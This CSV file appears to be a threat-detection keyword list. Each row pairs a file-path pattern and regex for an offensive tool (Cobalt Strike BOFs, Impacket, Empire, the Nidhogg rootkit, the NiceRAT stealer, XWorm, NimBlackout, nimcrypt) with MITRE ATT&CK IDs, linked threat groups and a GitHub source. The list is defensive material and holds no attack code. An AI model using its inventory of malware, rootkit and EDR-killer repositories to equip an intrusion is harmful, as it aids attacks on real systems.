"*/NetUser.cpp*",".{0,1000}\/NetUser\.cpp.{0,1000}","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/lengjibo/NetUser","1","1","N/A","N/A","10","10","420","90","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z","9122"
"*/NetUser.exe*",".{0,1000}\/NetUser\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/lengjibo/NetUser","1","1","N/A","N/A","10","10","420","90","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z","9123"
"*/netuserenum/*",".{0,1000}\/netuserenum\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","N/A","10","10","1389","234","2025-03-26T19:36:31Z","2020-07-15T16:21:18Z","9124"
"*/netview.py*",".{0,1000}\/netview\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","9125"
"*/network/bloodhound3*",".{0,1000}\/network\/bloodhound3.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","9126"
"*/Network/PortScan/*",".{0,1000}\/Network\/PortScan\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","N/A","10","10","635","57","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z","9127"
"*/NetworkFileManagerPHP.php*",".{0,1000}\/NetworkFileManagerPHP\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","9128"
"*/NewPhish.ps1*",".{0,1000}\/NewPhish\.ps1.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","9129"
"*/nexpose-brute.nse*",".{0,1000}\/nexpose\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9130"
"*/nfs-ls.nse*",".{0,1000}\/nfs\-ls\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9131"
"*/nfs-showmount.nse*",".{0,1000}\/nfs\-showmount\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9132"
"*/nfs-statfs.nse*",".{0,1000}\/nfs\-statfs\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9133"
"*/nginxed-root.sh*",".{0,1000}\/nginxed\-root\.sh.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","9134"
"*/ngrok http 3333 > /dev/null 2>&1*",".{0,1000}\/ngrok\shttp\s3333\s\>\s\/dev\/null\s2\>\&1.{0,1000}","offensive_tool_keyword","saycheese","Grab target's webcam shots by link","T1213 - T1071 - T1102 - T1123 - T1185 - T1200","TA0001 - TA0005 - TA0009 - TA0011","N/A","N/A","Phishing","https://github.com/hangetzzu/saycheese","1","0","#linux","N/A","9","10","1175","962","2024-06-18T23:39:41Z","2019-04-29T04:07:00Z","9135"
"*/Ngrok-Disk.dll*",".{0,1000}\/Ngrok\-Disk\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","N/A","10","","N/A","","","","9141"
"*/Ngrok-Install.dll*",".{0,1000}\/Ngrok\-Install\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","N/A","10","","N/A","","","","9142"
"*/NiceRAT.git*",".{0,1000}\/NiceRAT\.git.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","1","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","9144"
"*/NiceRAT.py*",".{0,1000}\/NiceRAT\.py.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","1","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","9145"
"*/NiceRAT-1.0.0.zip*",".{0,1000}\/NiceRAT\-1\.0\.0\.zip.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","1","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","9146"
"*/nidem/kerberoast*",".{0,1000}\/nidem\/kerberoast.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","APT20","Credential Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","N/A","10","1433","317","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z","9147"
"*/Nidhogg.cpp*",".{0,1000}\/Nidhogg\.cpp.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","1","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","9148"
"*/Nidhogg.exe*",".{0,1000}\/Nidhogg\.exe.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","1","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","9149"
"*/Nidhogg.git*",".{0,1000}\/Nidhogg\.git.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","1","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","9150"
"*/Nidhogg.zip*",".{0,1000}\/Nidhogg\.zip.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","1","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","9151"
"*/NidhoggClient.exe*",".{0,1000}\/NidhoggClient\.exe.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","1","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","9152"
"*/NidhoggClient/*",".{0,1000}\/NidhoggClient\/.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","1","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","9153"
"*/nightCrawler.ps1*",".{0,1000}\/nightCrawler\.ps1.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","1","N/A","N/A","9","1","15","0","2025-03-12T07:34:04Z","2025-03-12T06:58:51Z","9154"
"*/Nightmangle.git*",".{0,1000}\/Nightmangle\.git.{0,1000}","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","1","N/A","N/A","10","10","156","19","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z","9155"
"*/nikto.git*",".{0,1000}\/nikto\.git.{0,1000}","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/sullo/nikto","1","1","#linux","N/A","N/A","10","9184","1306","2025-02-22T14:30:28Z","2012-11-24T04:24:29Z","9156"
"*/nikto.pl*",".{0,1000}\/nikto\.pl.{0,1000}","offensive_tool_keyword","nikto","Nikto web scanner tool","T1210.001 - T1190 - T1046 - T1222","TA0007 - TA0002 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/sullo/nikto","1","1","#linux","N/A","N/A","10","9184","1306","2025-02-22T14:30:28Z","2012-11-24T04:24:29Z","9157"
"*/nikto.pl*",".{0,1000}\/nikto\.pl.{0,1000}","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/sullo/nikto","1","1","#linux","N/A","N/A","10","9184","1306","2025-02-22T14:30:28Z","2012-11-24T04:24:29Z","9158"
"*/NimBlackout*",".{0,1000}\/NimBlackout.{0,1000}","offensive_tool_keyword","NimBlackout","Kill AV/EDR leveraging BYOVD attack","T1562.001 - T1055.001 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Helixo32/NimBlackout","1","1","N/A","N/A","N/A","4","352","42","2023-07-11T07:32:50Z","2023-07-06T18:40:02Z","9159"
"*/NimBlackout*",".{0,1000}\/NimBlackout.{0,1000}","offensive_tool_keyword","NimBlackout","Kill AV/EDR leveraging BYOVD attack","T1562.001 - T1055.001 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Helixo32/NimBlackout","1","1","N/A","N/A","N/A","4","352","42","2023-07-11T07:32:50Z","2023-07-06T18:40:02Z","9160"
"*/NimBlackout*",".{0,1000}\/NimBlackout.{0,1000}","offensive_tool_keyword","NimBlackout","Kill AV/EDR leveraging BYOVD attack","T1562.001 - T1055.001 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Helixo32/NimBlackout","1","1","N/A","N/A","N/A","4","352","42","2023-07-11T07:32:50Z","2023-07-06T18:40:02Z","9161"
"*/NimBlackout*",".{0,1000}\/NimBlackout.{0,1000}","offensive_tool_keyword","NimBlackout","Kill AV/EDR leveraging BYOVD attack","T1562.001 - T1055.001 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Helixo32/NimBlackout","1","0","#linux","N/A","N/A","4","352","42","2023-07-11T07:32:50Z","2023-07-06T18:40:02Z","9162"
"*/nimcrypt.nim*",".{0,1000}\/nimcrypt\.nim.{0,1000}","offensive_tool_keyword","nimcrypt","Nimcrypt is a .NET PE Crypter written in Nim based entirely on the work of @byt3bl33d3r's OffensiveNim project","T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/icyguider/nimcrypt","1","1","N/A","N/A","N/A","1","98","7","2021-03-25T00:27:12Z","2021-03-24T17:51:52Z","9163"
"*/nimcrypt/*",".{0,1000}\/nimcrypt\/.{0,1000}","offensive_tool_keyword","nimcrypt","Nimcrypt is a .NET PE Crypter written in Nim based entirely on the work of @byt3bl33d3r's OffensiveNim project","T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/icyguider/nimcrypt","1","1","N/A","N/A","N/A","1","98","7","2021-03-25T00:27:12Z","2021-03-24T17:51:52Z","9164"
"*/Nimcrypt2*",".{0,1000}\/Nimcrypt2.{0,1000}","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1027 - T1202 - T1059.005 - T1105 - T1045","TA0005 - TA0011 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/icyguider/Nimcrypt2","1","1","N/A","N/A","N/A","8","771","124","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z","9165"
